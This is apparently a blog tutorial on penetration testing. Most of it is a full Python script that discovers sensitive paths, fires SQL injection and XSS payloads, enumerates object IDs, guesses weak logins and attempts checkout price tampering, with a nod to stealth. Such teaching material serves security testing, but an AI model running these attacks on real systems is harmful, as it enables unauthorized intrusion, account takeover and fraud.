In penetration testing and red teaming, many attacks are not just a single request, but a workflow: login → capture token → replay token → exploit vulnerable endpoint. Manually repeating these steps can be slow, noisy, and prone to error.
That’s where custom Python scripts with the requests
library shine. By chaining together multiple HTTP requests, you can automate complex workflows that attackers or testers often need.
Why Custom Scripts?
While tools like Burp Suite, OWASP ZAP, or Postman are excellent, sometimes you need more flexibility:
-
Repeatability – run the same workflow across multiple targets.
-
Logic chaining – capture a value (CSRF token, session cookie, API key) from one step and use it in the next.
-
Speed – automate hundreds of attempts without manual clicking.
-
Stealth – script-based attacks can blend in with “normal” user requests.
Example Workflow Attack
Let’s imagine a target app with the following flow:
-
Login with credentials.
-
Capture JWT token from the response.
-
Use token to access a protected API endpoint.
-
Exploit vulnerable parameter in that endpoint.
Here’s how a script might look:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 | #!/usr/bin/env python3 """ Workflow Attack Chaining Script Author: Security Researcher Description: Chains multiple web application attacks for penetration testing """ import requests import argparse import sys import re import json import time from urllib.parse import urljoin, urlparse, parse_qs from bs4 import BeautifulSoup class WorkflowAttackChainer: def __init__(self, target_url, cookies=None, headers=None): self.target_url = target_url self.session = requests.Session() self.csrf_tokens = {} self.discovered_endpoints = [] self.vulnerabilities = [] # Set custom headers if provided if headers: self.session.headers.update(headers) # Set cookies if provided if cookies: self.session.cookies.update(cookies) # Default headers default_headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1' } self.session.headers.update(default_headers) def discover_endpoints(self, max_depth=2): """Discover endpoints through spidering and common paths""" print(f"[*] Discovering endpoints on {self.target_url}") common_paths = [ '/admin', '/login', '/logout', '/register', '/profile', '/api', '/config', '/backup', '/upload', '/download', '/test', '/debug', '/console', '/phpinfo', '/.git', '/robots.txt', '/sitemap.xml', '/crossdomain.xml' ] # Check common paths for path in common_paths: full_url = urljoin(self.target_url, path) try: response = self.session.get(full_url, timeout=10) if response.status_code < 400: self.discovered_endpoints.append({ 'url': full_url, 'method': 'GET', 'status': response.status_code }) print(f"[+] Found: {full_url} ({response.status_code})") except requests.RequestException: continue # Basic spidering from homepage try: response = self.session.get(self.target_url, timeout=10) soup = BeautifulSoup(response.text, 'html.parser') for link in soup.find_all('a', href=True): href = link['href'] if href.startswith(('http://', 'https://')): if self.target_url in href: self.discovered_endpoints.append({ 'url': href, 'method': 'GET', 'status': 'unknown' }) elif href.startswith('/'): full_url = urljoin(self.target_url, href) self.discovered_endpoints.append({ 'url': full_url, 'method': 'GET', 'status': 'unknown' }) except requests.RequestException as e: print(f"[-] Error during spidering: {e}") def extract_csrf_tokens(self, response): """Extract CSRF tokens from response""" soup = BeautifulSoup(response.text, 'html.parser') tokens = {} # Look for CSRF tokens in various forms for input_tag in soup.find_all('input'): name = input_tag.get('name', '').lower() value = input_tag.get('value', '') if any(keyword in name for keyword in ['csrf', 'token', '_token', 'authenticity']): tokens[name] = value elif value and len(value) > 20: # Potential token tokens[name] = value return tokens def test_sql_injection(self, url, params): """Test for SQL injection vulnerabilities""" print(f"[*] Testing SQLi on {url}") sql_payloads = [ "'", "';", "' OR '1'='1", "' UNION SELECT NULL--", "1' ORDER BY 1--", "1' AND 1=1--", "1' AND 1=2--" ] for payload in sql_payloads: test_params = params.copy() for key in test_params: if isinstance(test_params[key], str): test_params[key] += payload try: response = self.session.get(url, params=test_params, timeout=10) # Check for common SQL error messages error_indicators = [ 'sql', 'mysql', 'ora-', 'syntax', 'database', 'query failed', 'you have an error' ] if any(indicator in response.text.lower() for indicator in error_indicators): self.vulnerabilities.append({ 'type': 'SQL Injection', 'url': url, 'payload': payload, 'evidence': 'Error message in response' }) print(f"[!] Potential SQLi found with payload: {payload}") break except requests.RequestException: continue def test_xss(self, url, params): """Test for XSS vulnerabilities""" print(f"[*] Testing XSS on {url}") xss_payloads = [ '<script>alert(1)</script>', '"><script>alert(1)</script>', 'javascript:alert(1)', 'onmouseover=alert(1)', '<img src=x onerror=alert(1)>' ] for payload in xss_payloads: test_params = params.copy() for key in test_params: if isinstance(test_params[key], str): test_params[key] = payload try: response = self.session.get(url, params=test_params, timeout=10) if payload in response.text: self.vulnerabilities.append({ 'type': 'XSS', 'url': url, 'payload': payload, 'evidence': 'Payload reflected in response' }) print(f"[!] Potential XSS found with payload: {payload}") break except requests.RequestException: continue def test_idor(self, url_pattern, id_range=(1, 100)): """Test for Insecure Direct Object References""" print(f"[*] Testing IDOR on pattern: {url_pattern}") for obj_id in range(id_range[0], id_range[1] + 1): test_url = url_pattern.replace('{id}', str(obj_id)) try: response = self.session.get(test_url, timeout=10) if response.status_code == 200 and len(response.content) > 0: self.vulnerabilities.append({ 'type': 'IDOR', 'url': test_url, 'evidence': f'Access to object ID {obj_id} possible' }) print(f"[!] Potential IDOR found: {test_url}") except requests.RequestException: continue def chain_authentication_attack(self): """Chain authentication-related attacks""" print("[*] Chaining authentication attacks...") # Test for weak credentials weak_creds = [ ('admin', 'admin'), ('admin', 'password'), ('test', 'test'), ('user', 'user') ] login_url = urljoin(self.target_url, '/login') for username, password in weak_creds: # Get login page to extract CSRF token try: response = self.session.get(login_url) csrf_tokens = self.extract_csrf_tokens(response) login_data = { 'username': username, 'password': password } login_data.update(csrf_tokens) # Attempt login response = self.session.post(login_url, data=login_data) if any(indicator in response.url.lower() for indicator in ['dashboard', 'home', 'profile']): self.vulnerabilities.append({ 'type': 'Weak Credentials', 'url': login_url, 'credentials': f'{username}:{password}', 'evidence': 'Successful login with weak credentials' }) print(f"[!] Weak credentials found: {username}:{password}") break except requests.RequestException: continue def chain_business_logic_attack(self): """Chain business logic workflow attacks""" print("[*] Chaining business logic attacks...") # Example: Test for price manipulation cart_url = urljoin(self.target_url, '/cart') checkout_url = urljoin(self.target_url, '/checkout') try: # Add item to cart add_to_cart_data = {'product_id': '1', 'quantity': '1'} self.session.post(cart_url, data=add_to_cart_data) # Modify price in checkout checkout_data = { 'items': '[{"id":1,"price":0.01,"quantity":1}]', 'total': '0.01' } response = self.session.post(checkout_url, data=checkout_data) if 'success' in response.text.lower() or response.status_code == 200: self.vulnerabilities.append({ 'type': 'Business Logic - Price Manipulation', 'url': checkout_url, 'evidence': 'Able to modify prices during checkout' }) print("[!] Price manipulation vulnerability found!") except requests.RequestException as e: print(f"[-] Business logic test failed: {e}") def generate_report(self): """Generate a comprehensive report""" report = { 'target': self.target_url, 'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'), 'endpoints_discovered': self.discovered_endpoints, 'vulnerabilities_found': self.vulnerabilities } print("\n" + "="*60) print("SECURITY ASSESSMENT REPORT") print("="*60) print(f"Target: {self.target_url}") print(f"Endpoints Discovered: {len(self.discovered_endpoints)}") print(f"Vulnerabilities Found: {len(self.vulnerabilities)}") print("="*60) for vuln in self.vulnerabilities: print(f"\n[{vuln['type']}]") print(f"URL: {vuln['url']}") print(f"Evidence: {vuln['evidence']}") if 'payload' in vuln: print(f"Payload: {vuln['payload']}") print("-" * 40) # Save report to file filename = f"security_report_{time.strftime('%Y%m%d_%H%M%S')}.json" with open(filename, 'w') as f: json.dump(report, f, indent=2) print(f"\n[+] Report saved to {filename}") def main(): parser = argparse.ArgumentParser(description='Web Application Workflow Attack Chainer') parser.add_argument('-u', '--url', required=True, help='Target URL') parser.add_argument('-c', '--cookies', help='Cookies in format key1=value1;key2=value2') parser.add_argument('-H', '--headers', help='Custom headers in JSON format') parser.add_argument('-a', '--auth', help='Basic auth in format user:pass') parser.add_argument('-p', '--proxy', help='Proxy server (http://proxy:port)') args = parser.parse_args() # Initialize attacker attacker = WorkflowAttackChainer(args.url) # Set proxy if provided if args.proxy: attacker.session.proxies = { 'http': args.proxy, 'https': args.proxy } # Set auth if provided if args.auth: username, password = args.auth.split(':', 1) attacker.session.auth = (username, password) # Parse cookies if args.cookies: cookies = {} for cookie in args.cookies.split(';'): if '=' in cookie: key, value = cookie.split('=', 1) cookies[key.strip()] = value.strip() attacker.session.cookies.update(cookies) # Parse headers if args.headers: try: headers = json.loads(args.headers) attacker.session.headers.update(headers) except json.JSONDecodeError: print("[-] Invalid JSON format for headers") sys.exit(1) try: # Execute attack chain print(f"[*] Starting workflow attack chain against {args.url}") # Phase 1: Discovery attacker.discover_endpoints() # Phase 2: Authentication attacks attacker.chain_authentication_attack() # Phase 3: Test discovered endpoints for endpoint in attacker.discovered_endpoints[:10]: # Limit to first 10 if '?' in endpoint['url']: url_parts = endpoint['url'].split('?') base_url = url_parts[0] params = parse_qs(url_parts[1]) # Test for SQLi and XSS attacker.test_sql_injection(base_url, params) attacker.test_xss(base_url, params) # Phase 4: Business logic attacks attacker.chain_business_logic_attack() # Phase 5: Generate report attacker.generate_report() except KeyboardInterrupt: print("\n[-] Scan interrupted by user") attacker.generate_report() except Exception as e: print(f"[-] Error during scanning: {e}") attacker.generate_report() if __name__ == "__main__": main() |
Key Techniques
-
Session handling:
requests.Session()
automatically manages cookies and headers. -
Dynamic token extraction: parse JSON/HTML responses for CSRF tokens, JWTs, or session IDs.
-
Parameter fuzzing: loop through payloads to test for injection vulnerabilities.
-
Error handling: detect server responses that indicate misconfigurations or weak validation.
When to Use This
-
Red Teaming – simulate realistic attacker workflows against your apps.
-
Bug Bounties – chain multiple small issues into a bigger exploit.
-
Pentesting – automate token harvesting, replay, or privilege escalation.
-
DevSecOps Testing – integrate into pipelines for regression testing of known flaws.
Takeaways
Custom scripts with requests
let you go beyond one-off requests. They allow you to chain steps into a complete workflow, making it easier to find and exploit vulnerabilities that would otherwise remain hidden.
Remember:
-
Always test responsibly in authorized environments.
-
Keep scripts modular so you can quickly adapt them for new targets.
-
Automate smartly—don’t just blast requests, but mimic real-world attack paths.
No comments:
Post a Comment